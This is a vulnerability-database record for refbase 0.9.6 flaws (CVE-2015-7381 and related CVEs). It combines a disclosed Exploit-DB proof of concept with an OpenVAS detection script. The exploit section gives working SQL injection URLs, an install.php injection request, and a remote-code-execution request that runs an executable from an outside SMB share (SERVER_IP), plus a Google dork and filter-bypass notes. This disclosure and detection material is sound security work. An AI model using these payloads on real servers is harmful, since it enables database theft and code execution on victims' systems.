ID: CVE-2015-7381
Type: cve
Reporter: cve@mitre.org
Modified: 2015-09-29T01:06:00
Description
Multiple PHP remote file inclusion vulnerabilities in install.php in Web Reference Database (aka refbase) through 0.9.6 allow remote attackers to execute arbitrary PHP code via the (1) pathToMYSQL or (2) databaseStructureFile parameter, a different issue than CVE-2015-6008.
{"exploitdb": [{"lastseen": "2016-02-04T07:45:46", "description": "refbase <= 0.9.6 - Multiple Vulnerabilities. CVE-2015-6008,CVE-2015-6009,CVE-2015-7381,CVE-2015-7382. Webapps exploit for php platform", "published": "2015-09-23T00:00:00", "type": "exploitdb", "title": "refbase <= 0.9.6 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7382", "CVE-2015-6009", "CVE-2015-7381", "CVE-2015-6008"], "modified": "2015-09-23T00:00:00", "id": "EDB-ID:38292", "href": "https://www.exploit-db.com/exploits/38292/", "sourceData": "# Exploit Title: Refbase <= 0.9.6 rss.php where parameter SQL Injection\r\n# Google Dork: \"powered by refbase\"\r\n# Date: 23 Sep 2015\r\n# Exploit Author: Mohab Ali\r\n# @0xAli\r\n# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database\r\n# Software Link: http://sourceforge.net/projects/refbase/\r\n# Reference: https://www.kb.cert.org/vuls/id/374092\r\n# Version: 0.8, 0.9, 0.9.5, 0.9.6\r\n# Tested on: WAMP (Windows)\r\n# CVE : CVE-2015-6009\r\n# Solution: Vulnerability hasn't been patched yet.\r\n\r\n**Summary **\r\nRefbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.\r\n\r\n\r\n** Vulnerable code **\r\n################################################################################\r\n#Line 35 : $queryWhereClause = $_REQUEST['where'];\r\n#Line 86 : $sanitizedWhereClause = extractWHEREclause(\" WHERE \" . $queryWhereClause);\r\n#Line 100: $sqlQuery .= \" FROM $tableRefs WHERE \" . $sanitizedWhereClause;\r\n#Line 123: $result = queryMySQLDatabase($query);\r\n################################################################################\r\n\r\n** Exploit POCs **\r\n/rss.php?where=1+and+5=(substr(@@version,1,1))-- -If it\u2019s true then the mysql version is > 5\r\n/rss.php?where='nonexistent'+union+all(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat('version:',@@version,''),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50)-- -\r\n/rss.php?where='nonexistent'+union+all(select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41)-- -\r\n\r\n\r\n[!] Version 0.8 and 0.9 provide no validation, but versions 0.9.5 and 0.9.6 provide some filtering so you better let sqlmap handle it.\r\n[!] The GET parameter \"where\" is vulnerable to SQL injection despite being filtered by a custom function called extractWHEREclause() it\u2019s still can be bypassed to inject other queries.\r\nThe extractWHEREclause() function which is defined in include.inc.php and it removes any additional MySQL keywords.\r\npreg_replace(\"/^.*? WHERE (.+?)(?= ORDER BY| LIMIT| GROUP BY| HAVING| PROCEDURE| FOR UPDATE| LOCK IN|[ ;]+(SELECT|INSERT|UPDATE|DELETE|CREATE|ALTER|DROP|FILE)\\b|$).*?$/i\", \"\\\\1\", $query);\r\nBut it can be bypassed.\r\n\r\n\r\n# Contacted vendor: 23 Dec 2014\r\n# Public disclosure: 23 Sep 2015 \t\t\r\n\r\n################################################################################\r\n\r\n# Exploit Title: Refbase <= 0.9.6 install.php defaultCharacterSet parameter SQL Injection\r\n# Google Dork: \"powered by refbase\"\r\n# Public Disclosure Date: 21 Sep 2015\r\n# Exploit Author: Mohab Ali\r\n# @0xAli\r\n# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database\r\n# Software Link: http://sourceforge.net/projects/refbase/\r\n# Reference: https://www.kb.cert.org/vuls/id/374092\r\n# Version: 0.8, 0.9, 0.9.5, 0.9.6.\r\n# Tested on: WAMP (Windows)\r\n# CVE : CVE-2015-6009\r\n# Solution: Remove the install.php file after the installation\r\n\r\n**Summary **\r\nRefbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.\r\n\r\n[!] You have to know the correct MySQL credentials.\r\n\r\n** Vulnerable code **\r\n################################################################################\r\n#Line 77 : $defaultCharacterSet = $_POST['defaultCharacterSet'];\r\n#Line 407: $queryCreateDB = $queryCreateDB . \" DEFAULT CHARACTER SET \" . $defaultCharacterSet;\r\n#Line 424: if (!($result = @ mysql_query ($queryCreateDB, $connection)))\r\n################################################################################\r\n\r\n** Exploit POC **\r\n\r\nRequest:\r\nPOST /install.php\r\nformType=install&submit=Install&adminUserName=root&adminPassword=pass&pathToMYSQL=C:\\mysql5.6.17\\bin\\mysql.exe&databaseStructureFile=./install.sql&pathToBibutils=&defaultCharacterSet=SQL QUERY HERE&submit=Install\r\n\r\n################################################################################\r\n\r\n# Exploit Title: Refbase <= 0.9.6 install.php pathToMYSQL parameter RCE (Windows)\r\n# Google Dork: \"powered by refbase\"\r\n# Public Disclosure Date: 21 Sep 2015\r\n# Exploit Author: Mohab Ali\r\n# @0xAli\r\n# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database\r\n# Software Link: http://sourceforge.net/projects/refbase/\r\n# Reference: https://www.kb.cert.org/vuls/id/374092\r\n# Version: 0.9.6 and earlier. 0.6.1 and prior versions are not vulnerable.\r\n# Tested on: Windows\r\n# CVE : CVE-2015-6008\r\n# Solution: Remove the install.php file after the installation\r\n\r\n**Summary **\r\nRefbase v 0.9.6 and earlier versions have an RCE vulnerability because of the insufficient validation when passing user supplied input to be executed by the system.\r\n\r\n[!] You have to know the correct MySQL credentials and this doesn't appear to be exploitable on Linux since (AFAIK) it can't execute scripts remote smb shares by default.\r\n\r\n\r\n** Vulnerable code **\r\n################################################################################\r\n#Line 62: $pathToMYSQL = $_POST['pathToMYSQL'];\r\n#Line 67: $databaseStructureFile = $_POST['databaseStructureFile'];\r\n#Line 429: exec($pathToMYSQL . \" -h \" . $hostName . \" -u \" . $adminUserName . \" -p\" .$adminPassword . \" --database=\" . $databaseName . \" < \" . $databaseStructureFile . \" 2>&1\", $resultArray);\r\n################################################################################\r\n\r\n[*] pathToMYSQL and databaseStructureFile can't be empty, and has to be real file. And they can't contain ';' or '|'\r\n[*] To exploit this in Windows you can provide an executable on a remote share and execute it.\r\n\r\n** Exploit POC **\r\n\r\nRequest:\r\nformType=install&submit=Install&adminUserName=root&adminPassword=123&pathToMYSQL=%5C%5CSERVER_IP%5CShare%5Cexec.bat&databaseStructureFile=.%2Finstall.sql&pathToBibutils=&defaultCharacterSet=latin1&submit=Install\r\n\r\nExecuted command:\r\n\\\\SERVER_IP\\Share\\exec.bat -h localhost -u root -p123 --database=literature < ./install.sql 2>&1\r\n\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38292/"}], "openvas": [{"lastseen": "2020-05-12T17:25:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-6007", "CVE-2015-6012", "CVE-2015-6010", "CVE-2015-7382", "CVE-2015-6011", "CVE-2015-6009", "CVE-2015-7381", "CVE-2015-7383", "CVE-2015-6008"], "description": "The host is installed with Reference\n Database and is prone to multiple vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2015-10-05T00:00:00", "id": "OPENVAS:1361412562310806062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806062", "type": "openvas", "title": "Web Reference Database Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Web Reference Database Multiple Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:refbase:refbase\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806062\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2015-6007\", \"CVE-2015-6008\", \"CVE-2015-6009\", \"CVE-2015-6010\",\n \"CVE-2015-6011\", \"CVE-2015-6012\", \"CVE-2015-7381\", \"CVE-2015-7382\",\n \"CVE-2015-7383\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-05 13:23:43 +0530 (Mon, 05 Oct 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Web Reference Database Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Reference\n Database and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request\n and check whether it is able to execute sql query or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - The application does not employ cross-site request forgery protection (CSRF)\n mechanisms, such as CSRF tokens.\n\n - Insufficient sanitization of user supplied input via referrer GET parameter\n by multiple pages.\n\n - Insufficient sanitization of user supplied via id GET parameter in unapi.php\n and stylesheet GET parameter in sru.php file.\n\n - Multiple input sanitization errors in install.php file via defaultCharacterSet,\n adminPassword, pathToMYSQL and databaseStructureFile POST parameters.\n\n - Insufficient sanitization of user supplied input via errorNo and errorMsg\n GET parameters in error.php file.\n\n - Insufficient sanitization of user supplied input via viewType GET parameter\n in duplicate_manager.php.\n\n - Insufficient sanitization of user supplied input via where GET parameter in\n rss.php file.\n\n - Insufficient sanitization of user supplied input via sqlQuery GET parameter\n in search.php file.\n\n - Insufficient sanitization of user supplied input via sourceText and sourceIDs\n POST variables in import.php file.\n\n - Insufficient sanitization of user supplied input via adminUserName POST\n parameter in update.php.\n\n - Insufficient sanitization of user supplied input via typeName and fileName\n POST parameters in modify.php file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to submit valid requests to the server on behalf of authenticated\n users, execute arbitrary code on the server, directly read, write, and modify\n arbitrary data in the application's database, redirect victims to malicious\n web addresses.\");\n\n script_tag(name:\"affected\", value:\"refbase versions 0.9.6 and possibly earlier\");\n\n script_tag(name:\"solution\", value:\"As a workaround restrict access to the\n application to trusted users and networks and manually remove install.php\n and update.php scripts from production deployments of the application\n when they are not needed.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/374092\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/38292\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_refbase_detect.nasl\");\n script_mandatory_keys(\"Refbase/Installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.refbase.net/index.php/Web_Reference_Database\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!refPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:refPort)){\n exit(0);\n}\n\nurl = dir + \"/rss.php?where=%27nonexistent%27+union+all(select+1,2,3,4,5,6,\"+\n \"7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,\"+\n \"29,30,31,32,concat(%27version:%27,%27You%20have%20an%20error%20\"+\n \"in%20your%20sql%20syntax%27,@@version,%27%27,%27SQL-INJECTION-\"+\n \"TEST%27),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50)--%20-\";\n\nsndReq = http_get(item:url, port:refPort);\nrcvRes = http_keepalive_send_recv(port:refPort, data:sndReq);\n\nif(rcvRes =~ \"HTTP/1.1 302\")\n{\n Location = eregmatch( pattern:\"Location: ([0-9a-zA-Z.?=&%_-]+)\", string:rcvRes );\n url = \"/\" + Location[1];\n\n if(!Location[1]){\n exit(0);\n }\n\n if(http_vuln_check(port:refPort, url:url, check_header:FALSE,\n pattern:\"You have an error in your sql syntax\",\n extra_check:make_list(\"SQL-INJECTION-TEST\", \"refbase\")))\n {\n report = http_report_vuln_url( port:refPort, url:url );\n security_message(port:refPort, data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}